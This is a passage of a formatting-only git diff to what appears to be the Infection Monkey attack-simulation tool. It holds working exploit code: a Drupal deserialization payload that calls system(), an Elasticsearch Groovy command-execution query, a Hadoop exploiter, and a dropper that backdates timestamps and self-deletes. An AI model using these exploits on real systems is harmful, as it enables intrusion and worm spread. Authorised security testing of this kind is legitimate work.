timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) return {} @staticmethod @@ -221,7 +260,8 @@ class ControlClient(object): @staticmethod def download_monkey_exe_by_os(is_windows, is_32bit): filename, size = ControlClient.get_monkey_exe_filename_and_size_by_host_dict( - ControlClient.spoof_host_os_info(is_windows, is_32bit)) + ControlClient.spoof_host_os_info(is_windows, is_32bit) + ) if filename is None: return None return ControlClient.download_monkey_exe_by_filename(filename, size) @@ -241,14 +281,7 @@ class ControlClient(object): else: arch = "x86_64" - return \ - { - "os": - { - "type": os, - "machine": arch - } - } + return {"os": {"type": os, "machine": arch}} @staticmethod def download_monkey_exe_by_filename(filename, size): @@ -259,13 +292,15 @@ class ControlClient(object): if (monkeyfs.isfile(dest_file)) and (size == monkeyfs.getsize(dest_file)): return dest_file else: - download = requests.get("https://%s/api/monkey/download/%s" % # noqa: DUO123 - (WormConfiguration.current_server, filename), - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + download = requests.get( + "https://%s/api/monkey/download/%s" + % (WormConfiguration.current_server, filename), # noqa: DUO123 + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) - with monkeyfs.open(dest_file, 'wb') as file_obj: + with monkeyfs.open(dest_file, "wb") as file_obj: for chunk in download.iter_content(chunk_size=DOWNLOAD_CHUNK): if chunk: file_obj.write(chunk) @@ -274,8 +309,9 @@ class ControlClient(object): return dest_file except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) @staticmethod def get_monkey_exe_filename_and_size_by_host(host): @@ -286,24 +322,29 @@ class ControlClient(object): if not WormConfiguration.current_server: return None, None try: - reply = requests.post("https://%s/api/monkey/download" % (WormConfiguration.current_server,), # noqa: DUO123 - data=json.dumps(host_dict), - headers={'content-type': 'application/json'}, - verify=False, proxies=ControlClient.proxies, - timeout=LONG_REQUEST_TIMEOUT) + reply = requests.post( + "https://%s/api/monkey/download" + % (WormConfiguration.current_server,), # noqa: DUO123 + data=json.dumps(host_dict), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=LONG_REQUEST_TIMEOUT, + ) if 200 == reply.status_code: result_json = reply.json() - filename = result_json.get('filename') + filename = result_json.get("filename") if not filename: return None, None - size = result_json.get('size') + size = result_json.get("size") return filename, size else: return None, None except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) return None, None @@ -312,11 +353,11 @@ class ControlClient(object): if not WormConfiguration.current_server: return None - my_proxy = ControlClient.proxies.get('https', '').replace('https://', '') + my_proxy = ControlClient.proxies.get("https", "").replace("https://", "") if my_proxy: proxy_class = TcpProxy try: - target_addr, target_port = my_proxy.split(':', 1) + target_addr, target_port = my_proxy.split(":", 1) target_port = int(target_port) except ValueError: return None @@ -329,34 +370,43 @@ class ControlClient(object): @staticmethod def get_pba_file(filename): try: - return requests.get(PBA_FILE_DOWNLOAD % # noqa: DUO123 - (WormConfiguration.current_server, filename), - verify=False, - proxies=ControlClient.proxies, - timeout=LONG_REQUEST_TIMEOUT) + return requests.get( + PBA_FILE_DOWNLOAD % (WormConfiguration.current_server, filename), # noqa: DUO123 + verify=False, + proxies=ControlClient.proxies, + timeout=LONG_REQUEST_TIMEOUT, + ) except requests.exceptions.RequestException: return False @staticmethod def get_T1216_pba_file(): try: - return requests.get(urljoin(f"https://{WormConfiguration.current_server}/", # noqa: DUO123 - T1216_PBA_FILE_DOWNLOAD_PATH), - verify=False, - proxies=ControlClient.proxies, - stream=True, - timeout=MEDIUM_REQUEST_TIMEOUT) + return requests.get( + urljoin( + f"https://{WormConfiguration.current_server}/", # noqa: DUO123 + T1216_PBA_FILE_DOWNLOAD_PATH, + ), + verify=False, + proxies=ControlClient.proxies, + stream=True, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except requests.exceptions.RequestException: return False @staticmethod def should_monkey_run(vulnerable_port: str) -> bool: - if vulnerable_port and \ - WormConfiguration.get_hop_distance_to_island() > 1 and \ - ControlClient.can_island_see_port(vulnerable_port) and \ - WormConfiguration.started_on_island: - raise PlannedShutdownException("Monkey shouldn't run on current machine " - "(it will be exploited later with more depth).") + if ( + vulnerable_port + and WormConfiguration.get_hop_distance_to_island() > 1 + and ControlClient.can_island_see_port(vulnerable_port) + and WormConfiguration.started_on_island + ): + raise PlannedShutdownException( + "Monkey shouldn't run on current machine " + "(it will be exploited later with more depth)." + ) return True @staticmethod @@ -365,13 +415,15 @@ class ControlClient(object): url = f"https://{WormConfiguration.current_server}/api/monkey_control/check_remote_port/{port}" response = requests.get(url, verify=False, timeout=SHORT_REQUEST_TIMEOUT) response = json.loads(response.content.decode()) - return response['status'] == "port_visible" + return response["status"] == "port_visible" except requests.exceptions.RequestException: return False @staticmethod def report_start_on_island(): - requests.post(f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island", - data=json.dumps({'started_on_island': True}), - verify=False, - timeout=MEDIUM_REQUEST_TIMEOUT) + requests.post( + f"https://{WormConfiguration.current_server}/api/monkey_control/started_on_island", + data=json.dumps({"started_on_island": True}), + verify=False, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index 9b374c9f1..74c20321b 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -13,7 +13,11 @@ from ctypes import c_char_p from common.utils.attack_utils import ScanStatus, UsageEnum from infection_monkey.config import WormConfiguration from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly -from infection_monkey.model import GENERAL_CMDLINE_LINUX, MONKEY_CMDLINE_LINUX, MONKEY_CMDLINE_WINDOWS +from infection_monkey.model import ( + GENERAL_CMDLINE_LINUX, + MONKEY_CMDLINE_LINUX, + MONKEY_CMDLINE_WINDOWS, +) from infection_monkey.system_info import OperatingSystem, SystemInfoCollector from infection_monkey.telemetry.attack.t1106_telem import T1106Telem @@ -29,7 +33,7 @@ except NameError: # noinspection PyShadowingBuiltins WindowsError = IOError -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -39,108 +43,141 @@ MOVEFILE_DELAY_UNTIL_REBOOT = 4 class MonkeyDrops(object): def __init__(self, args): arg_parser = argparse.ArgumentParser() - arg_parser.add_argument('-p', '--parent') - arg_parser.add_argument('-t', '--tunnel') - arg_parser.add_argument('-s', '--server') - arg_parser.add_argument('-d', '--depth', type=int) - arg_parser.add_argument('-l', '--location') - arg_parser.add_argument('-vp', '--vulnerable-port') + arg_parser.add_argument("-p", "--parent") + arg_parser.add_argument("-t", "--tunnel") + arg_parser.add_argument("-s", "--server") + arg_parser.add_argument("-d", "--depth", type=int) + arg_parser.add_argument("-l", "--location") + arg_parser.add_argument("-vp", "--vulnerable-port") self.monkey_args = args[1:] self.opts, _ = arg_parser.parse_known_args(args) - self._config = {'source_path': os.path.abspath(sys.argv[0]), - 'destination_path': self.opts.location} + self._config = { + "source_path": os.path.abspath(sys.argv[0]), + "destination_path": self.opts.location, + } def initialize(self): LOG.debug("Dropper is running with config:\n%s", pprint.pformat(self._config)) def start(self): - if self._config['destination_path'] is None: + if self._config["destination_path"] is None: LOG.error("No destination path specified") return False # we copy/move only in case path is different try: - file_moved = filecmp.cmp(self._config['source_path'], self._config['destination_path']) + file_moved = filecmp.cmp(self._config["source_path"], self._config["destination_path"]) except OSError: file_moved = False - if not file_moved and os.path.exists(self._config['destination_path']): - os.remove(self._config['destination_path']) + if not file_moved and os.path.exists(self._config["destination_path"]): + os.remove(self._config["destination_path"]) # first try to move the file if not file_moved and WormConfiguration.dropper_try_move_first: try: - shutil.move(self._config['source_path'], - self._config['destination_path']) + shutil.move(self._config["source_path"], self._config["destination_path"]) - LOG.info("Moved source file '%s' into '%s'", - self._config['source_path'], self._config['destination_path']) + LOG.info( + "Moved source file '%s' into '%s'", + self._config["source_path"], + self._config["destination_path"], + ) file_moved = True except (WindowsError, IOError, OSError) as exc: - LOG.debug("Error moving source file '%s' into '%s': %s", - self._config['source_path'], self._config['destination_path'], - exc) + LOG.debug( + "Error moving source file '%s' into '%s': %s", + self._config["source_path"], + self._config["destination_path"], + exc, + ) # if file still need to change path, copy it if not file_moved: try: - shutil.copy(self._config['source_path'], - self._config['destination_path']) + shutil.copy(self._config["source_path"], self._config["destination_path"]) - LOG.info("Copied source file '%s' into '%s'", - self._config['source_path'], self._config['destination_path']) + LOG.info( + "Copied source file '%s' into '%s'", + self._config["source_path"], + self._config["destination_path"], + ) except (WindowsError, IOError, OSError) as exc: - LOG.error("Error copying source file '%s' into '%s': %s", - self._config['source_path'], self._config['destination_path'], - exc) + LOG.error( + "Error copying source file '%s' into '%s': %s", + self._config["source_path"], + self._config["destination_path"], + exc, + ) return False if WormConfiguration.dropper_set_date: - if sys.platform == 'win32': - dropper_date_reference_path = os.path.expandvars(WormConfiguration.dropper_date_reference_path_windows) + if sys.platform == "win32": + dropper_date_reference_path = os.path.expandvars( + WormConfiguration.dropper_date_reference_path_windows + ) else: dropper_date_reference_path = WormConfiguration.dropper_date_reference_path_linux try: ref_stat = os.stat(dropper_date_reference_path) except OSError: - LOG.warning("Cannot set reference date using '%s', file not found", - dropper_date_reference_path) + LOG.warning( + "Cannot set reference date using '%s', file not found", + dropper_date_reference_path, + ) else: try: - os.utime(self._config['destination_path'], - (ref_stat.st_atime, ref_stat.st_mtime)) + os.utime( + self._config["destination_path"], (ref_stat.st_atime, ref_stat.st_mtime) + ) except OSError: LOG.warning("Cannot set reference date to destination file") - monkey_options = \ - build_monkey_commandline_explicitly(parent=self.opts.parent, - tunnel=self.opts.tunnel, - server=self.opts.server, - depth=self.opts.depth, - location=None, - vulnerable_port=self.opts.vulnerable_port) + monkey_options = build_monkey_commandline_explicitly( + parent=self.opts.parent, + tunnel=self.opts.tunnel, + server=self.opts.server, + depth=self.opts.depth, + location=None, + vulnerable_port=self.opts.vulnerable_port, + ) if OperatingSystem.Windows == SystemInfoCollector.get_os(): - monkey_cmdline = MONKEY_CMDLINE_WINDOWS % {'monkey_path': self._config['destination_path']} + monkey_options + monkey_cmdline = ( + MONKEY_CMDLINE_WINDOWS % {"monkey_path": self._config["destination_path"]} + + monkey_options + ) else: - dest_path = self._config['destination_path'] + dest_path = self._config["destination_path"] # In linux we have a more complex commandline. There's a general outer one, and the inner one which actually # runs the monkey - inner_monkey_cmdline = MONKEY_CMDLINE_LINUX % {'monkey_filename': dest_path.split("/")[-1]} + monkey_options - monkey_cmdline = GENERAL_CMDLINE_LINUX % {'monkey_directory': dest_path[0:dest_path.rfind("/")], - 'monkey_commandline': inner_monkey_cmdline} + inner_monkey_cmdline = ( + MONKEY_CMDLINE_LINUX % {"monkey_filename": dest_path.split("/")[-1]} + + monkey_options + ) + monkey_cmdline = GENERAL_CMDLINE_LINUX % { + "monkey_directory": dest_path[0 : dest_path.rfind("/")], + "monkey_commandline": inner_monkey_cmdline, + } - monkey_process = subprocess.Popen(monkey_cmdline, shell=True, - stdin=subprocess.PIPE, - stdout=subprocess.PIPE, - stderr=subprocess.PIPE, - close_fds=True, creationflags=DETACHED_PROCESS) + monkey_process = subprocess.Popen( + monkey_cmdline, + shell=True, + stdin=subprocess.PIPE, + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + close_fds=True, + creationflags=DETACHED_PROCESS, + ) - LOG.info("Executed monkey process (PID=%d) with command line: %s", - monkey_process.pid, monkey_cmdline) + LOG.info( + "Executed monkey process (PID=%d) with command line: %s", + monkey_process.pid, + monkey_cmdline, + ) time.sleep(3) if monkey_process.poll() is not None: @@ -150,25 +187,35 @@ class MonkeyDrops(object): LOG.info("Cleaning up the dropper") try: - if (self._config['source_path'].lower() != self._config['destination_path'].lower()) and \ - os.path.exists(self._config['source_path']) and \ - WormConfiguration.dropper_try_move_first: + if ( + (self._config["source_path"].lower() != self._config["destination_path"].lower()) + and os.path.exists(self._config["source_path"]) + and WormConfiguration.dropper_try_move_first + ): # try removing the file first try: - os.remove(self._config['source_path']) + os.remove(self._config["source_path"]) except Exception as exc: - LOG.debug("Error removing source file '%s': %s", self._config['source_path'], exc) + LOG.debug( + "Error removing source file '%s': %s", self._config["source_path"], exc + ) # mark the file for removal on next boot - dropper_source_path_ctypes = c_char_p(self._config['source_path']) - if 0 == ctypes.windll.kernel32.MoveFileExA(dropper_source_path_ctypes, None, - MOVEFILE_DELAY_UNTIL_REBOOT): - LOG.debug("Error marking source file '%s' for deletion on next boot (error %d)", - self._config['source_path'], ctypes.windll.kernel32.GetLastError()) + dropper_source_path_ctypes = c_char_p(self._config["source_path"]) + if 0 == ctypes.windll.kernel32.MoveFileExA( + dropper_source_path_ctypes, None, MOVEFILE_DELAY_UNTIL_REBOOT + ): + LOG.debug( + "Error marking source file '%s' for deletion on next boot (error %d)", + self._config["source_path"], + ctypes.windll.kernel32.GetLastError(), + ) else: - LOG.debug("Dropper source file '%s' is marked for deletion on next boot", - self._config['source_path']) + LOG.debug( + "Dropper source file '%s' is marked for deletion on next boot", + self._config["source_path"], + ) T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send() LOG.info("Dropper cleanup complete") diff --git a/monkey/infection_monkey/exploit/HostExploiter.py b/monkey/infection_monkey/exploit/HostExploiter.py index 59d593b09..e5bdf6dfe 100644 --- a/monkey/infection_monkey/exploit/HostExploiter.py +++ b/monkey/infection_monkey/exploit/HostExploiter.py @@ -8,7 +8,7 @@ from common.utils.exploit_enum import ExploitType from infection_monkey.config import WormConfiguration from infection_monkey.utils.plugins.plugin import Plugin -__author__ = 'itamar' +__author__ = "itamar" logger = logging.getLogger(__name__) @@ -48,31 +48,42 @@ class HostExploiter(Plugin): def __init__(self, host): self._config = WormConfiguration - self.exploit_info = {'display_name': self._EXPLOITED_SERVICE, - 'started': '', - 'finished': '', - 'vulnerable_urls': [], - 'vulnerable_ports': [], - 'executed_cmds': []} + self.exploit_info = { + "display_name": self._EXPLOITED_SERVICE, + "started": "", + "finished": "", + "vulnerable_urls": [], + "vulnerable_ports": [], + "executed_cmds": [], + } self.exploit_attempts = [] self.host = host def set_start_time(self): - self.exploit_info['started'] = datetime.now().isoformat() + self.exploit_info["started"] = datetime.now().isoformat() def set_finish_time(self): - self.exploit_info['finished'] = datetime.now().isoformat() + self.exploit_info["finished"] = datetime.now().isoformat() def is_os_supported(self): - return self.host.os.get('type') in self._TARGET_OS_TYPE + return self.host.os.get("type") in self._TARGET_OS_TYPE def send_exploit_telemetry(self, result): from infection_monkey.telemetry.exploit_telem import ExploitTelem + ExploitTelem(self, result).send() - def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''): - self.exploit_attempts.append({'result': result, 'user': user, 'password': password, - 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key}) + def report_login_attempt(self, result, user, password="", lm_hash="", ntlm_hash="", ssh_key=""): + self.exploit_attempts.append( + { + "result": result, + "user": user, + "password": password, + "lm_hash": lm_hash, + "ntlm_hash": ntlm_hash, + "ssh_key": ssh_key, + } + ) def exploit_host(self): self.pre_exploit() @@ -80,9 +91,9 @@ class HostExploiter(Plugin): try: result = self._exploit_host() except FailedExploitationError as e: - logger.debug(f'Exploiter failed: {e}.') + logger.debug(f"Exploiter failed: {e}.") except Exception: - logger.error('Exception in exploit_host', exc_info=True) + logger.error("Exception in exploit_host", exc_info=True) finally: self.post_exploit() return result @@ -98,10 +109,10 @@ class HostExploiter(Plugin): raise NotImplementedError() def add_vuln_url(self, url): - self.exploit_info['vulnerable_urls'].append(url) + self.exploit_info["vulnerable_urls"].append(url) def add_vuln_port(self, port): - self.exploit_info['vulnerable_ports'].append(port) + self.exploit_info["vulnerable_ports"].append(port) def add_executed_cmd(self, cmd): """ @@ -109,5 +120,4 @@ class HostExploiter(Plugin): :param cmd: String of executed command. e.g. 'echo Example' """ powershell = True if "powershell" in cmd.lower() else False - self.exploit_info['executed_cmds'].append( - {'cmd': cmd, 'powershell': powershell}) + self.exploit_info["executed_cmds"].append({"cmd": cmd, "powershell": powershell}) diff --git a/monkey/infection_monkey/exploit/drupal.py b/monkey/infection_monkey/exploit/drupal.py index 04b0ce431..efbbc2f56 100644 --- a/monkey/infection_monkey/exploit/drupal.py +++ b/monkey/infection_monkey/exploit/drupal.py @@ -9,20 +9,19 @@ from urllib.parse import urljoin import requests -from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT, - MEDIUM_REQUEST_TIMEOUT) +from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT from common.network.network_utils import remove_port from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.model import ID_STRING -__author__ = 'Ophir Harpaz' +__author__ = "Ophir Harpaz" LOG = logging.getLogger(__name__) class DrupalExploiter(WebRCE): - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Drupal Server' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Drupal Server" def __init__(self, host): super(DrupalExploiter, self).__init__(host) @@ -34,9 +33,11 @@ class DrupalExploiter(WebRCE): :return: the Drupal exploit config """ exploit_config = super(DrupalExploiter, self).get_exploit_config() - exploit_config['url_extensions'] = ['node/', # In Linux, no path is added - 'drupal/node/'] # However, Bitnami installations are under /drupal - exploit_config['dropper'] = True + exploit_config["url_extensions"] = [ + "node/", # In Linux, no path is added + "drupal/node/", + ] # However, Bitnami installations are under /drupal + exploit_config["dropper"] = True return exploit_config def add_vulnerable_urls(self, potential_urls, stop_checking=False): @@ -51,17 +52,19 @@ class DrupalExploiter(WebRCE): try: node_ids = find_exploitbale_article_ids(url) if node_ids is None: - LOG.info('Could not find a Drupal node to attack') + LOG.info("Could not find a Drupal node to attack") continue for node_id in node_ids: node_url = urljoin(url, str(node_id)) if self.check_if_exploitable(node_url): - self.add_vuln_url(url) # This is for report. Should be refactored in the future + self.add_vuln_url( + url + ) # This is for report. Should be refactored in the future self.vulnerable_urls.append(node_url) if stop_checking: break except Exception as e: # We still don't know which errors to expect - LOG.error(f'url {url} failed in exploitability check: {e}') + LOG.error(f"url {url} failed in exploitability check: {e}") if not self.vulnerable_urls: LOG.info("No vulnerable urls found") @@ -75,35 +78,39 @@ class DrupalExploiter(WebRCE): """ payload = build_exploitability_check_payload(url) - response = requests.get(f'{url}?_format=hal_json', # noqa: DUO123 - json=payload, - headers={"Content-Type": "application/hal+json"}, - verify=False, - timeout=MEDIUM_REQUEST_TIMEOUT) + response = requests.get( + f"{url}?_format=hal_json", # noqa: DUO123 + json=payload, + headers={"Content-Type": "application/hal+json"}, + verify=False, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) if is_response_cached(response): - LOG.info(f'Checking if node {url} is vuln returned cache HIT, ignoring') + LOG.info(f"Checking if node {url} is vuln returned cache HIT, ignoring") return False - return 'INVALID_VALUE does not correspond to an entity on this site' in response.text + return "INVALID_VALUE does not correspond to an entity on this site" in response.text def exploit(self, url, command): # pad a easy search replace output: - cmd = f'echo {ID_STRING} && {command}' + cmd = f"echo {ID_STRING} && {command}" base = remove_port(url) payload = build_cmd_execution_payload(base, cmd) - r = requests.get(f'{url}?_format=hal_json', # noqa: DUO123 - json=payload, - headers={"Content-Type": "application/hal+json"}, - verify=False, - timeout=LONG_REQUEST_TIMEOUT) + r = requests.get( + f"{url}?_format=hal_json", # noqa: DUO123 + json=payload, + headers={"Content-Type": "application/hal+json"}, + verify=False, + timeout=LONG_REQUEST_TIMEOUT, + ) if is_response_cached(r): - LOG.info(f'Exploiting {url} returned cache HIT, may have failed') + LOG.info(f"Exploiting {url} returned cache HIT, may have failed") if ID_STRING not in r.text: - LOG.warning('Command execution _may_ have failed') + LOG.warning("Command execution _may_ have failed") result = r.text.split(ID_STRING)[-1] return result @@ -126,14 +133,16 @@ class DrupalExploiter(WebRCE): num_available_urls = len(self.vulnerable_urls) result = num_available_urls >= num_urls_needed_for_full_exploit if not result: - LOG.info(f'{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server ' - f'but only {num_available_urls} found') + LOG.info( + f"{num_urls_needed_for_full_exploit} URLs are needed to fully exploit a Drupal server " + f"but only {num_available_urls} found" + ) return result def is_response_cached(r: requests.Response) -> bool: """ Check if a response had the cache header. """ - return 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT' + return "X-Drupal-Cache" in r.headers and r.headers["X-Drupal-Cache"] == "HIT" def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100) -> set: @@ -141,12 +150,12 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100 articles = set() while lower < upper: node_url = urljoin(base_url, str(lower)) - response = requests.get(node_url, - verify=False, - timeout=LONG_REQUEST_TIMEOUT) # noqa: DUO123 + response = requests.get( + node_url, verify=False, timeout=LONG_REQUEST_TIMEOUT + ) # noqa: DUO123 if response.status_code == 200: if is_response_cached(response): - LOG.info(f'Found a cached article at: {node_url}, skipping') + LOG.info(f"Found a cached article at: {node_url}, skipping") else: articles.add(lower) lower += 1 @@ -155,20 +164,10 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100 def build_exploitability_check_payload(url): payload = { - "_links": { - "type": { - "href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}" - } - }, - "type": { - "target_id": "article" - }, - "title": { - "value": "My Article" - }, - "body": { - "value": "" - } + "_links": {"type": {"href": f"{urljoin(url, '/rest/type/node/INVALID_VALUE')}"}}, + "type": {"target_id": "article"}, + "title": {"value": "My Article"}, + "body": {"value": ""}, } return payload @@ -178,21 +177,17 @@ def build_cmd_execution_payload(base, cmd): "link": [ { "value": "link", - "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000" - "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"" - "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:" - "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";" - "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000" - "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000" - "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"" - "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" - "".replace('|size|', str(len(cmd))).replace('|command|', cmd) + "options": 'O:24:"GuzzleHttp\\Psr7\\FnStream":2:{s:33:"\u0000' + 'GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{s:5:"' + 'close";a:2:{i:0;O:23:"GuzzleHttp\\HandlerStack":3:' + '{s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";' + 's:|size|:"|command|";s:30:"\u0000GuzzleHttp\\HandlerStack\u0000' + 'stack";a:1:{i:0;a:1:{i:0;s:6:"system";}}s:31:"\u0000' + 'GuzzleHttp\\HandlerStack\u0000cached";b:0;}i:1;s:7:"' + 'resolve";}}s:9:"_fn_close";a:2:{i:0;r:4;i:1;s:7:"resolve";}}' + "".replace("|size|", str(len(cmd))).replace("|command|", cmd), } ], - "_links": { - "type": { - "href": f"{urljoin(base, '/rest/type/shortcut/default')}" - } - } + "_links": {"type": {"href": f"{urljoin(base, '/rest/type/shortcut/default')}"}}, } return payload diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py index dfaffac6a..ca1c0408b 100644 --- a/monkey/infection_monkey/exploit/elasticgroovy.py +++ b/monkey/infection_monkey/exploit/elasticgroovy.py @@ -13,12 +13,18 @@ import requests from common.common_consts.network_consts import ES_SERVICE from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import (BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, CMD_PREFIX, DOWNLOAD_TIMEOUT, ID_STRING, - WGET_HTTP_UPLOAD) +from infection_monkey.model import ( + BITSADMIN_CMDLINE_HTTP, + CHECK_COMMAND, + CMD_PREFIX, + DOWNLOAD_TIMEOUT, + ID_STRING, + WGET_HTTP_UPLOAD, +) from infection_monkey.network.elasticfinger import ES_PORT from infection_monkey.telemetry.attack.t1197_telem import T1197Telem -__author__ = 'danielg, VakarisZ' +__author__ = "danielg, VakarisZ" LOG = logging.getLogger(__name__) @@ -26,21 +32,28 @@ LOG = logging.getLogger(__name__) class ElasticGroovyExploiter(WebRCE): # attack URLs MONKEY_RESULT_FIELD = "monkey_result" - GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD - JAVA_CMD = \ - GENERIC_QUERY % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" + GENERIC_QUERY = ( + """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD + ) + JAVA_CMD = ( + GENERIC_QUERY + % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" + ) - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Elastic search' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Elastic search" def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) def get_exploit_config(self): exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() - exploit_config['dropper'] = True - exploit_config['url_extensions'] = ['_search?pretty'] - exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP} + exploit_config["dropper"] = True + exploit_config["url_extensions"] = ["_search?pretty"] + exploit_config["upload_commands"] = { + "linux": WGET_HTTP_UPLOAD, + "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP, + } return exploit_config def get_open_service_ports(self, port_list, names): @@ -56,7 +69,9 @@ class ElasticGroovyExploiter(WebRCE): try: response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT) except requests.ReadTimeout: - LOG.error("Elastic couldn't upload monkey, because server didn't respond to upload request.") + LOG.error( + "Elastic couldn't upload monkey, because server didn't respond to upload request." + ) return False result = self.get_results(response) if not result: @@ -65,7 +80,7 @@ class ElasticGroovyExploiter(WebRCE): def upload_monkey(self, url, commands=None): result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands) - if 'windows' in self.host.os['type'] and result: + if "windows" in self.host.os["type"] and result: T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send() return result @@ -76,14 +91,14 @@ class ElasticGroovyExploiter(WebRCE): """ try: json_resp = json.loads(response.text) - return json_resp['hits']['hits'][0]['fields'][self.MONKEY_RESULT_FIELD] + return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD] except (KeyError, IndexError): return None def check_if_exploitable(self, url): # Overridden web_rce method that adds CMD prefix for windows command try: - if 'windows' in self.host.os['type']: + if "windows" in self.host.os["type"]: resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND) else: resp = self.exploit(url, CHECK_COMMAND) diff --git a/monkey/infection_monkey/exploit/hadoop.py b/monkey/infection_monkey/exploit/hadoop.py index 36da16379..b9dd20159 100644 --- a/monkey/infection_monkey/exploit/hadoop.py +++ b/monkey/infection_monkey/exploit/hadoop.py @@ -15,16 +15,21 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import HADOOP_LINUX_COMMAND, HADOOP_WINDOWS_COMMAND, ID_STRING, MONKEY_ARG +from infection_monkey.model import ( + HADOOP_LINUX_COMMAND, + HADOOP_WINDOWS_COMMAND, + ID_STRING, + MONKEY_ARG, +) -__author__ = 'VakarisZ' +__author__ = "VakarisZ" LOG = logging.getLogger(__name__) class HadoopExploiter(WebRCE): - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Hadoop' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Hadoop" HADOOP_PORTS = [["8088", False]] # How long we have our http server open for downloads in seconds DOWNLOAD_TIMEOUT = 60 @@ -41,13 +46,13 @@ class HadoopExploiter(WebRCE): if not self.vulnerable_urls: return False # We presume hadoop works only on 64-bit machines - if self.host.os['type'] == 'windows': - self.host.os['machine'] = '64' + if self.host.os["type"] == "windows": + self.host.os["machine"] = "64" paths = self.get_monkey_paths() if not paths: return False - http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path']) - command = self.build_command(paths['dest_path'], http_path) + http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"]) + command = self.build_command(paths["dest_path"], http_path) if not self.exploit(self.vulnerable_urls[0], command): return False http_thread.join(self.DOWNLOAD_TIMEOUT) @@ -57,35 +62,47 @@ class HadoopExploiter(WebRCE): def exploit(self, url, command): # Get the newly created application id - resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"), - timeout=LONG_REQUEST_TIMEOUT) + resp = requests.post( + posixpath.join(url, "ws/v1/cluster/apps/new-application"), 